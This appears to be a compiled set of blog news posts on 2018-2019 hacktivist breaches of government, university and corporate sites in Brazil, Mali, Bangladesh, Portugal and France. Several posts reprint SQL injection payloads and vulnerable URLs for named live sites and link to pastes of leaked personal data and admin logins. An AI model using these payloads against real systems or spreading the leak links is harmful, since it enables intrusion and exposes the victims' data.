Supermarket Value Network & ROGS Real Estate Services Hacked by Cyber S4g3

No photo description available.

This weekend a hacker going by the name of “Cyber S4g3” of the Brasilian based hacking group known as “Backbone Squad” announced the hack and leak of two international corporations, the Supermarket Value Network of Brasil and ROGS Real Estate Services in Portugal.

The first leak of Supermarket Value Network contains over 1,400 lines, comprising of various information including files, order invoices, inventory reports, written statements from corporate executives and much more. The second leak of ROGS Real Estate Services contains the mirrored location of file folders contained within two MySQL version 5.0.12 databases, containing information such as client email addresses and login information. In addition to posting the mirror of file folders, Cyber S4g3 also released the login user name and password of two site administrators, theoretically granting public access to the back-end of the website.

In a message attached to the first hack, Cyber S4g3 released the following:

Here is a beautiful question: How long do we stand by watching our TV’s report that our leaders are just shitting on humanity?

There is no salvation for something that has already been developed to be enslaved. It is not my fault, nor the rest of humanity. It is the fault of those who hold the arbitrary and totalitarian control over the means of communication, the means of production, and the means to distribute it to the masses.

Let’s not watch the entire Apocalypse Machine with our head down. This is only the beginning of a revolt that will not soon end. You’ve simultaneously created the disease while trying to sell the cure. We will not stop resisting until we find a way to overthrow everything that you hold so dear.

Website: hxxp://welcometorogs.com/
Raw Data Leak: https://privatebin.net/?2b9d33bfef72f951#EZmRNtS4t5HHm1yFVed62+0AVbvHQBJveYujVCSm4GQ=

In a message attached to the second hack, Cyber S4g3 released the following:

There are some human beings who’ve merely chosen to keep their minds wrapped around a world of fantasies, however immature that may be. There are yet other human beings who simply want to exterminate this fantasy world by proving that the Matrix is ​​failing, just like everyone else. We’re watching! All that is above, is below, as well as that which is below, is above. All just 0’s and 1’s scattered in all directions.

Website: hxxp://redevalor.net.br
Raw Data Leak: https://ghostbin.com/paste/w3aeh

Ministry of Health and Public Hygiene of Mali & Skills for Employment Investment Program Hacked by France GhostSec

No photo description available.

Over the weekend a hacker going by the name of “Mizaru” of “GhostSecurity France” claimed responsibility for the hack and leak of two international government agencies. The first leak targeted Ministry of Health and Public Hygiene of Mali and the second targeted the Skills for Employment Investment Program in Bangladesh. At the present moment in time their appears to be no correlation between the two instances and not much is known about the hackers or their group. For example, Mizaru just joined Twitter in January 2019 and the leaks provided below account for two of their first three postings to the service.

This is the first time Mizaru has leaked anything to Rogue Media Labs, and the leaks are somewhat different than what I am used to dealing with. For example, the first leak from Mali doesn’t necessarily contain much information from inside the databases effected. Rather, it is a mirrored copy of what the files contained within the sites databases look like. Browsing through the leaked information though, it is clear that the hacker compromised the website via SQL Injection, granting them access to MySQL version 10.13 databases containing Distrib version 5.6.13 files hosted on a Windows Operating System (OS).

Ministry of Health and Public Hygiene of Mali: hxxps://sante.gov.ml/
Raw Data Leak: https://ghostbin.com/paste/s74v6

The second leak effecting the Skills for Employment Investment Program of Bangladesh was a little more “traditional” and featured much more information. For example, the leak provided personally identifiable information on over 600 students, including their full names, date of births, addresses, phone numbers, personal emails, religion, spouses, parents, siblings, bank accounts , school ID numbers and much more.

Skills for Employment Investment Program: hxxp://seip-fd.gov.bd
Raw Data Leak: https://ghostbin.com/paste/zbgk3

Browse Through Leak:

[pdf-embedder url=”https://roguemedia.co/wp-content/uploads/2019/01/zbgk3-Ghostbin.pdf” title=”zbgk3 – Ghostbin”]

https://twitter.com/MZR_h4x0r/status/1087681526945497088

https://twitter.com/MZR_h4x0r/status/1087482460361900032

Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, December 31st 2018, hackers “Shizen” and “Ftp” of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brasil, managing to leak the contents of databases tied to the Hematology and Hemotherapy Center of Piaui online. Having covered Shizen many times throughout the past, this appears to be the first hack carried out under the banned of New World Hackers, after previously conducting hacks on behalf of Pryzraky – perhaps indicating a change of teams or allegiances. 

Regardless, to serve as proof of the hack, in a data dump posted to Twitter this morning, the hackers posted a mirror of the sites contents – 21 different databases in all. Analyzing the hack, it appears as though the group was able to gain remote access to site databases through a multitude of SQL vulnerabilities left unaddressed by site security architects, ultimately granting hackers access to PHP 5.3.3 files, attached to a MySQL 5.0 Database hosted on an Apache 2.2.16 web server. In another surprise move, Shizen even released the exact vulnerabilities effected and payloads delivered within the framework of the leak itself – something normally redacted or kept private.

For Example, Here are The 4 SQL Vulnerabilities Implicated:

Website Hit: hxxp://hemopi.pi.gov.br/

Vulnerability 1: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=13′ AND 7214=7214 AND ‘aWjt’=’aWjt

Vulnerability 2: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13′ AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘lEbP’=’lEbP

Vulnerability 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13′ AND SLEEP(5) AND ‘ouoQ’=’ouoQ

Vulnerability 4: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: id=13′ UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)– EKMl

Raw Database Leak: https://ghostbin.com/paste/6w4ok

Image may contain: text

https://twitter.com/__sh1z3n/status/1079589738355531777

Akatsuki Gang Releases Database Disclosure Vulnerability Effecting Tribunal de Contas do Distrito Federal

Last night the “Akatsuki Gang” leaked a Database Disclosure Vulnerability effecting the website of the Court of Auditors of the Federal District of Brasil, allowing for remote access/download of the websites file systems and databases. Analyzing their methodology, leveraging open ports left exposed by poorly constructed security settings, hackers were able to implement a Relative Path Traversal (CWE-23) attack against the websites file system structure, ultimately gaining access to a MySQL database hosting PHP 5.5.9. files hosted on an Apache 2.4.7 web server attached to a WordPress.org website.

It remains unclear what the hackers did with the data they uncovered, but what we do know is that they managed to gain access to 41 tables/folders inside a database labeled “selic,” exposing information such as passwords, site uploads, comments and administrator user data. In a message attached to the hack, the group left a sarcastic message reading “Um verdadeiro patriota é o tipo que leva uma multa de estacionamento e fica contente porque o sistema funcionou!” Translated this reads to say ‘a true Patriot is happy to get a parking ticket because that means the system has worked!‘ – lol. It remains unclear if that hack was conducted as a result of a parking ticket, or if the group was just being facetious.

Website Effected: hxxp://tc.df.gov.br/
Site Vulnerability: hxxp://tc.df.gov.br/selic/download.php?codof=41
Raw Leak: https://ghostbin.com/paste/e3zs5

No automatic alt text available.

Akatsuki Gang Announces Hack of Brasil’s Ministry of Finance, Leaking Location of Site Exploits & Databases Online

In a posting released on Twitter December 20th 2018, the “Akatsuki Gang” announced a hack of Brasil’s Ministry of Finance, managing to leak sensitive information tied to the sites back end, inner workings and databases online. Analyzing the attack, it appears as though the Akutsuki Gang exploited an SQL vulnerability attached to the landing page of previdencia.gov.br/conteudoDinamico.php?id=1093 – gaining remote access to a MySQL database containing PHP version 7.2.10 files hosted on a Microsoft-IIS 10.0 web server.

While the leak contains approximately 6,345 lines, most of the data is mirrored locations of various folders, files and databases contained on the sites web page – only browse-able should you gain physical access to website yourself. With that said however, there is some interesting/valuable material contained within the information dumped online, such as a full list of all the sites DNS records, the IP Address and destinations of all the sites sub-domains, the websites IP, Network and Netmask Addresses, as well as the sites back end login page – which isn’t currently protected against brute force attacks.

In a message attached to the hack/leak, the Akatsuki Gang released a full list of its members, explaining that “We Are: SNM Anops &&& D3coder &&& Knushh &&& SpySec &&& L0ster &&& CooldGirl &&& Satuur.” Also leaving behind a dark/ominous message stating “Can you take revenge on evil without becoming a part of it? I do not live to please you, when I make choices I’m prepared to face the consequences myself. Otaku is good, it’s just Otaku being himself.” According to a separate press release on Twitter, the Akatsuki Gang announced that they will be targeting Brasil’s Ministry of Agriculture, Livestock and Farming next.

Website Effected: hxxp://previdencia.gov.br
Location of Vulnerability: hxxp://previdencia.gov.br/conteudoDinamico.php?id=1093
Raw Leak: https://ghostbin.com/paste/xho67

This is the first time I have covered the Akatsuki Gang for Rogue Media Labs, but the group has been extremely active throughout the later half of 2018. For example, over the course of the last 3 months alone, the group has hacked websites and databases belonging to the Military Police of Piaui, Military Police of the State of Goiás, Civil Police of Rio de Janeiro, Federal University of Rio de Janeiro, Brasilian Party of Women and municipalities of the states of Natal, Mins Gerais, Pernambuco, Santa Catarina and São Paulo, as well as pages of USP and the Courts of Justice of Espírito Santo (TJES) and Santa Catarina (TJSC).

Read More About The Groups Activities Here: https://www.defcon-lab.org/tag/akatsuki-gang/

No automatic alt text available.

l’academie de Grenoble Refused To Negotiate, So SHIZEN Dumps SQL Vulnerabilities & Exposed Databases Online

On December 6th 2018, Rogue Media Labs covered an article detailing the hack of two international University’s by a Brasilian based hacker known as “SHIZEN.” However, what made the incident interesting or unique at the time was that SHIZEN did not disclose the databases he had uncovered, or how he went about doing so – something he is regularly known for doing. Instead, he tagged l’academie de Grenoble in the hack, asking them to reach out to him to learn where/how he got into their systems and where their website was vulnerable. Over the course of the last week and a half since, SHIZEN has continued to keep this information to himself, trolling the University on multiple occasions asking them to contact him about the hack – less he release the information in its entirety online. After days with no response, this is exactly what SHIZEN did this morning.

In a data dump released to the public via Ghostbin this morning, December 15th 2016, SHIZEN released the contents of the databases exposed in the December 6th hack, explaining how he was able to breach l’academie de Grenobles’s website through an SQL vulnerability tied to the academy’s math department. More specifically, SHIZEN was able to hack php version 5.3.3 files belonging to an extremely outdated MySQL database attached to a nginx web server. In fact, the MySQL database was so outdated that it’s version wasn’t even readably identifiable.

Target Website: hxxp://ac-grenoble.com
SQL User Haxxed: plantet_math@triton2.ac-grenoble
Location of SQL Injection: hxxps://ac-grenoble.fr/disciplines/maths/pages/PM/fonction/telechargement.php?/fichier/=1899%27%20and%20[t]%20and%20%271%27=%271
Database Name: De8u1
Data Dump: https://ghostbin.com/paste/58cjh

https://twitter.com/__sh1z3n/status/1074336600333656064?s=19

Databases of Faculdade Faveni Hacked and Dumped Online, Exposing Information on +400 Students

Earlier today, December 11th 2018, “Ergo Hacker” of Pryzraky announced a hack of Faculdade Faveni, a post graduate university in Venda Nova do Imigrante, Brasil. The hack itself was carried out in conjunction with #OpEdu, a much broader hacking operation targeting international colleges and universities which as already seen the hack/leak of Baqai Medical University in Pakistan, l’académie de Grenoble in France, San Jose State University in the US and Academia Nacional De La Historia De La Republica Argentina – among many others.

In the press release provided below, Ergo explains how he was able to breach PHP 5.5.38 file systems attached to two MySQL 5.0 databases belonging to the hostname (sv251.faveni.edu.br). Presumably exploiting the back-end of the website via SQL Injection, Ergo then managed to uncover and extract approximately 128.27 KB of data pertaining to over 400 post-graduate students, including full names, emails, CPF, tuition rates, course enrollments and much more.

Website Effected: hxxp://posgraduacaofaveni.com.br/
Full Raw Leak: https://ghostbin.com/paste/2ovuf
Database Download (128.27 KB): https://anonfile.com/X5Z3vfn1b3/alunos_xlsx

https://twitter.com/ergo_hacker/status/1072588043222167554